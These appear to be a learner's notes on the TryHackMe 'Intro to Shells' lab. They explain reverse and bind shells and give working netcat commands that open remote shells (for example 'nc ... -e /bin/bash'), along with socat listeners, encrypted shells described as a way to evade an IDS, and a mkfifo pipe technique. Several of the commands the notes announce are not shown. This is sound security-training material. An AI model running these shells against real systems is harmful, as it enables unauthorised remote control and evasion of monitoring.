Shells
https://tryhackme.com/r/room/introtoshells
Last updated
There are two kinds of shell when it comes to exploiting a target:
Reverse Shell: When the target is forced to execute code that connects back to the attack box.
ATTACK BOX: nc -nvlp 1337
TARGET: nc -nv $ATTACKBOX 1337 -e /bin/bash
Bind Shell: The code executed on the target is used to start a listener attached to a shell.
TARGET: nc -nvlp 1337 -e "cmd.exe"
ATTACK BOX: nc $TARGET 1337
Shells can also be either interactive or non-interactive.
Interactive: These shells let the user interact with a program after it starts. Some programs require this, such as ssh or sudo prompting for a password.
Non-Interactive: The user is limited to programs that need no further input after they are launched. Running an interactive command from a non-interactive shell can make the shell stall and become unusable, because the program is waiting for input on a terminal that is not attached to the connection.
Netcat is the most basic tool in a pentester's toolkit when it comes to networking.
Reverse Shell (listener on the attack box): nc -nvlp $PORT
-l: Tells netcat to listen for an incoming connection
-v: Requests verbose output
-n: Tells netcat not to resolve host names (no DNS lookups)
-p: Indicates that a port specification will follow
Bind Shell (connecting from the attack box to the listener on the target): nc $TARGET $PORT
The socat tool acts as a connector between two points. These points could be listening ports, keyboards, files, etcetera.
Reverse Shell: socat TCP-L:$PORT -
To connect back to this listener on the attack box, the following commands can be used from a Windows or Linux target:
The pipes option forces PowerShell to use Unix-style standard input and output.
Bind Shell: socat TCP:$TARGET:$PORT -
To start the bind shell on the target, the following command can be used:
Socat can also be used to build a fully stable Linux tty reverse shell. It is significantly more stable than the standard socat tunnel or a netcat connection.
TTY Listener: socat TCP-L:$PORT FILE:`tty`,raw,echo=0
The target must have socat installed to connect back to this specific listener. If it does not, a precompiled (static) socat binary can be uploaded to the target and used to launch the reverse shell. The connect command from the target would look like the following:
Another useful capability of socat is creating encrypted shells. Because the traffic is encrypted, an IDS that inspects payload contents cannot see the commands or their output, which can help bypass it. The first step is generating a certificate to use for the encryption:
This command creates a 2048 bit RSA key with matching cert file, self-signed, and valid for a year. The next part will be merging the two created files:
Now, using the pem file, the listener and connectors can be set up for either reverse shells or bind shells.
Reverse Shell
Bind Shell
The tool mkfifo which is used to make a named pipe (first in-first out), can also be used to make a reverse shell.
Listener:
The command first creates a named pipe at /tmp/f. The pipe is read with cat and fed into /bin/sh as its input; the shell's stderr is redirected into stdout, and that combined output is piped into a netcat listener. Whatever netcat receives from the connecting attack box is written back into the named pipe, so it becomes the shell's next input and the loop is closed. The connector can be built similarly with the following commands.
Connector:
When targeting a Windows machine, it is common to use a PowerShell reverse shell. The following PowerShell reverse shell can be used to connect to a listener on the attack box: